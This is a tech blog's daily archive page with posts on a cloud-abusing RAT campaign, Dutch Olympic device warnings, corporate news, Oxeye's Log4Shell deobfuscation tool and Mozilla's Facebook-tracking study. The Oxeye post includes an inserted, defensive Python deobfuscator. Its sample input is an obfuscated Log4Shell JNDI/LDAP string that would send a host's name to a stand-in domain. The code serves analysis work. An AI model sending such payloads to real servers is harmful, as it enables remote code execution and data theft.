Archive for January 12, 2022

New Remote Access Trojan Targeting AWS & Azure Cloud Services Discovered

Posted in Commentary with tags on January 12, 2022 by itnerd

Cisco Talos has today released new research showing that a new RAT (Remote Access Trojan) campaign has been abusing AWS and Azure cloud services since October 2021, spreading a trio of RAT payloads with the aim of stealing data from infected machines. In response to these findings, an expert with Gurucul has offered perspective.

Saryu Nayyar, CEO and Founder of Gurucul, offers this comment:

“The new RAT variant is a perfect example of why it is important to have a cloud-native and multi-cloud next generation threat detection solution like a next generation SIEM. Even more important is that non rule-based true machine learning capabilities are critical to detect emerging variants out of the box. Risk-based user behavioral detection and analytics are a requirement to help security teams pinpoint the unusual commands being executed, unexpected external communications and data leakage of credentials or financial information. As we’ve seen in many cases, integrated and automated response capabilities, when targeted and low-risk, can accelerate remediation in time to prevent theft.” 

This is clearly one of those cases where detection and prevention are the way to avoid being a victim of this RAT campaign. Hopefully those who rely on AWS and Azure workloads have the means to protect themselves.

UPDATE: I have this commentary from Stephanie Simpson, who is the VP of Product Management at SCYTHE:

“Attacks against Remote Administration Tools (RATs) are nothing new. We’ve already seen them for technologies like NetWire and being used by cybercriminals like SlothfulMedia malware. This is another case of threat actors changing their tactics, techniques, and practices (TTPs), adjusting to new environments. When testing security controls, organizations need to start thinking about the different ways that malicious actors are changing known TTPs to find new ways to attack systems.”

UPDATE #2: Chris Olson, CEO at The Media Trust had this to say:

“Today, most organizations are employing advanced SPAM filters and other forms of protection against traditional phishing channels, along with antivirus software to prevent malicious payloads from executing. But as we’ve seen many times before, cyber actors adapt to obstacles by changing their tactics – in this case, by deploying obfuscated code to escape detection, and dynamic DNS to prevent blocking.”

“But cloud-based attackers are a little late to the game here, as we’ve seen both these tactics used for years in AdTech and web-based attacks. Consequently, we have warned our clients not to depend on simple ad blockers – equivalent to antivirus – or domain lists, which are rarely updated quickly enough to reflect the way cyber actors jump between different domain and ad partners.”

“In the future, we can expect cyberattacks to become more anonymized, dynamic, and harder to detect through automated methods. Organizations must work to better understand the code that is executing throughout their digital environment by continually monitoring activity and carefully vetting their IT partners.”

Dutch Olympic Committee To Dutch Athletes: Don’t Take Your Phones And Laptops To The Winter Olympics In China

Posted in Commentary with tags on January 12, 2022 by itnerd

Right now, China doesn’t exactly have the best public perception when it comes to being trustworthy. That’s on display in this Reuters article, where Dutch athletes are being told by the Dutch Olympic Committee to leave their phones and laptops at home when they go to the Winter Olympics being held in China:

Dutch athletes competing in next month’s Beijing Winter Olympics will need to leave their phones and laptops at home in an unprecedented move to avoid Chinese espionage, Dutch newspaper De Volkskrant reported on Tuesday. The urgent advice to athletes and supporting staff to not bring any personal devices to China was part of a set of measures proposed by the Dutch Olympic Committee (NOCNSF) to deal with any possible interference by Chinese state agents, the paper said citing sources close to the matter. NOCNSF spokesman Geert Slot said cybersecurity was part of the risk assessment made for the trip to China, but declined to comment on any specific measure. “The importance of cybersecurity of course has grown over the years”, Slot said. “But China has completely closed off its internet, which makes it a specific case.”

It will be interesting to see how China reacts to this. If they say nothing, you have to wonder why, as it implies that China is actually doing something. But if they react in an angry manner, then you might say exactly the same thing. And I can see a scenario where, if other countries copy the Dutch, the Chinese might really freak out as a result.

Get the popcorn ready.

Telstra Appoints Vish Vishwanathan to Head Wholesale Group in the Americas

Posted in Commentary with tags on January 12, 2022 by itnerd

Telstra has named Vish Vishwanathan as Vice President of its Wholesale group for the Americas. He joins Telstra as the company is entering its latest phase of international growth and network expansion.  

Vishwanathan will take charge of Telstra’s existing business that serves telecom and satellite providers across North America, spearhead plans to extend the company’s reach across Latin America and expand its services capabilities to satellite operators. 

Vishwanathan will draw on his 30-plus years of experience in the telecommunications industry, successfully launching new technologies and services, leading sales organizations and developing new markets across the Americas, Europe and Asia. 

Vishwanathan previously led global IP network sales for NTT and has also held senior sales and market development roles at CenturyLink, MCI International and Motorola.

Telstra is a leading telecommunications and technology company with a proudly Australian heritage and a longstanding, growing international business. They have been operating in the Americas for over 25 years and provide data and IP transit, internet connectivity, network application services such as unified communications and cloud, and managed services to over 500 businesses in 160 cities in the region. Their products and services are supported by one of the largest fiber optic submarine cable systems reaching Asia-Pacific and beyond, with licenses in Asia, Europe and the Americas, and access to more than 2,000 points-of-presence around the world. Through their unparalleled network reach and reliability as well as market-leading customer service and expertise, they connect businesses in the Americas to some of the world’s fastest growing economies, including China, Southeast Asia, North Asia, and Australia. For more information, please visit www.telstra.com/americas.

Infosec Institute Named A Top 25 Cybersecurity Company By The Software Report 

Posted in Commentary with tags on January 12, 2022 by itnerd

Infosec Institute, a leading cybersecurity education company, announced that it was recognized by The Software Report as one of the Top 25 Cybersecurity Companies in 2021. The award celebrates cybersecurity companies that are committed to providing the most cutting-edge protection solutions for their customers.

The Software Report, a comprehensive source for market research and insights, selected Infosec from hundreds of nominations based on their leadership in the field and resounding feedback from industry professionals. Infosec was recognized alongside industry leaders like Palo Alto Networks, McAfee, Blackberry and BugCrowd. To be considered for the Top 25 list, each nominated organization had to:

  • Be a cybersecurity company demonstrating dominance in their respective category 
  • Demonstrate the effectiveness of their leadership teams 
  • Show an ability to establish a positive, inclusive working environment  

See the full list of 2021 Top 25 Cybersecurity Companies. 

Oxeye Claims To Mitigate Log4Shell Vulnerability With Ox4Shell Open-Source Payload Deobfuscation Tool

Posted in Commentary with tags on January 12, 2022 by itnerd

Oxeye, a technology innovator in cloud-native application security testing solutions, today unveiled the first 2022 open-source initiative with the introduction of Ox4Shell. The powerful and free open-source payload deobfuscation tool is the first in a series of solutions to be developed by Oxeye to assist developers, AppSec professionals, and the open-source community. Ox4Shell is designed to confront what some are calling the “Covid of the Internet,” known as the Log4Shell zero-day vulnerability. To counter a very effective obfuscation tactic used by malicious actors, Oxeye’s new open-source tool (available on GitHub) exposes hidden payloads which are actively being used to confuse security protection tools and security teams.

As reported by experts, organizations globally continue to experience remote code execution attacks and the exposure of sensitive data due to the pervasive Log4Shell vulnerability. Discovered in Apache’s Log4j, a logging library in widespread use by web and server application developers, the flaw makes it possible for attacker-supplied text injected into log messages or log message parameters to reach the server’s logs, where it can trigger the loading of code from a remote server for malicious use. Apache has given Log4Shell a CVSS severity rating of 10 out of 10, the highest possible score. Since then, researchers have found a similar vulnerability in the popular H2 database. The exploit is simple to execute and is estimated to affect hundreds of millions of devices.

As part of a new open-source initiative for 2022, Oxeye is unveiling the first in a series of contributions designed to strengthen security efforts by deobfuscating payloads often coupled with Log4J exploits. Ox4Shell exposes obscured payloads and transforms them into more meaningful forms to provide a clear understanding of what threat actors are trying to achieve. This allows concerned parties to take immediate action and resolve the vulnerability.

The Log4j library has a few unique lookup functions that let users look up environment variables, Java process runtime information, and so forth. These enable threat actors to probe for specific information that uniquely identifies a compromised machine they’ve targeted. Ox4Shell lets you satisfy such lookup functions by feeding them mock data that you control.
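As an added illustration of the lookup mocking described above (this is not Oxeye's code and is not from the original post), the Python below resolves nested lower/upper/default-value lookups inside-out, answers env/sys/java/hostName lookups with analyst-chosen mock data, and reports which host-identifying lookups a captured payload tried to evaluate; the MOCK_LOOKUPS table and SAMPLE string are constructed for the example.

```python
import re

# Mock values handed to the lookups Log4j exposes (constructed sample data;
# the analyst chooses what a "compromised" host appears to report).
MOCK_LOOKUPS = {
    "env": {"HOSTNAME": "mock-host", "USER": "mock-user"},
    "sys": {"user.name": "mock-user", "os.name": "MockOS"},
    "java": {"version": "mock-java"},
    "hostName": "mock-host",
}

# Matches the innermost ${...} tokens, i.e. those with no nested "${" inside.
INNER = re.compile(r"\$\{([^${}]*)\}")


def resolve(body, mock, probes):
    """Evaluate one innermost lookup body the way Log4j would, using mock data."""
    key, default = body.split(":-", 1) if ":-" in body else (body, None)
    prefix, arg = key.split(":", 1) if ":" in key else (key, "")
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "":                      # the "${::-x}" trick simply yields x
        return default or ""
    table = mock.get(prefix)
    if table is not None:                 # env/sys/java/...: record what was probed
        probe = f"{prefix}:{arg}" if arg else prefix
        if probe not in probes:
            probes.append(probe)
        if isinstance(table, str):
            return table
        if arg in table:
            return table[arg]
    if default is not None:               # unknown key, but a default was given
        return default
    return "${" + body + "}"              # leave unresolvable lookups untouched


def deobfuscate(payload, mock=MOCK_LOOKUPS, max_passes=50):
    """Resolve nested lookups inside-out until the text stops changing; return (text, probes)."""
    probes = []
    for _ in range(max_passes):
        new = INNER.sub(lambda m: resolve(m.group(1), mock, probes), payload)
        if new == payload:
            break
        payload = new
    return payload, probes


# Constructed sample resembling an obfuscated payload captured in a log line.
SAMPLE = "${${::-j}${lower:N}d${lower:I}:ldap://${env:HOSTNAME:-unknown}.example.invalid/a}"
```

Running `deobfuscate(SAMPLE)` yields the normalised string a detection rule can match plus the list of lookups the payload tried to resolve, which is the information the attacker hoped to exfiltrate.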

Availability
Ox4Shell is generally available on GitHub at no charge. Oxeye invites developers and security professionals interested in learning more to visit https://www.oxeye.io/ox4shell-deobfuscate-log4shell or to download the software at https://github.com/ox-eye/Ox4Shell. To schedule a personalized demo of the full Oxeye Cloud Native Application Security Testing (CNAST) platform, please visit https://www.oxeye.io/get-a-demo.

Mozilla Is Going To Track Facebook Tracking You Via A Study With Journalists

Posted in Commentary with tags on January 12, 2022 by itnerd

This should be interesting.

Mozilla has announced that they are starting a study and it involves figuring out how Facebook tracks you:

In a collaboration between journalists at The Markup and Mozilla researchers, this study seeks to map Facebook’s pixel tracking network and understand the kinds of information it collects on sites across the web. The Markup will use the data collected in this study to create investigative journalism around the kinds of information Facebook collects about you, and where.

And:

According to its own privacy policy, Facebook may collect information about you across the web even if you don’t have a Facebook account. One way Facebook performs this tracking is through a network of “pixels” that may be installed on many of the sites you visit. By joining this study, you will help Rally and The Markup investigate and report on where Facebook is tracking you and what kind of information they are collecting.

Now it is going to be very interesting to see what data Facebook is actually collecting, as I am pretty sure that they are likely not being truthful about that. But I guess we’re about to find out. If you want to participate, you will need to download Mozilla Rally, which is a browser extension that will collect data sent out by Facebook’s pixels as you browse across the web. Aside from that data, the extension also keeps track of the time spent on different web pages, the URLs that the browser visits, and more. Mozilla was quick to note in its announcement that the only data being exported from the extension will be de-identified, and not shared with any third parties besides The Markup’s reporters. And I believe that, as I have a lot more trust in Mozilla than I do in Facebook.